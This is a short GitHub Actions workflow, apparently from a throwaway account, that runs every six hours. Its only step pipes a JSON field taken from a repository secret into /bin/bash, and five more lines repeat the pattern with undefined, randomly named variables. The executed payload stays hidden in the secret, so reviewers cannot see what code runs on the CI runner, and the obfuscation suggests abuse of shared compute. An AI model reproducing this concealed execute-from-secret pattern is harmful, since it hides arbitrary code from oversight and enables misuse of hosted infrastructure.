name: luojianhua7514

on:
  workflow_dispatch:
  schedule:
    - cron: '26 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: luojianhua7514
        env:
          mc5: ${{ secrets.mc5 }}
        run: |
          echo $mc5 | jq -r .ixj0141 | /bin/bash
          echo $vtqir64 | jq -r .mow0220 | /bin/bash
          echo $wdkuq570 | jq -r .c866 | /bin/bash
          echo $zx98 | jq -r .ogp31 | /bin/bash
          echo $qpn2636 | jq -r .tbsk3686 | /bin/bash
          echo $fwclw91682 | jq -r .y86791 | /bin/bash

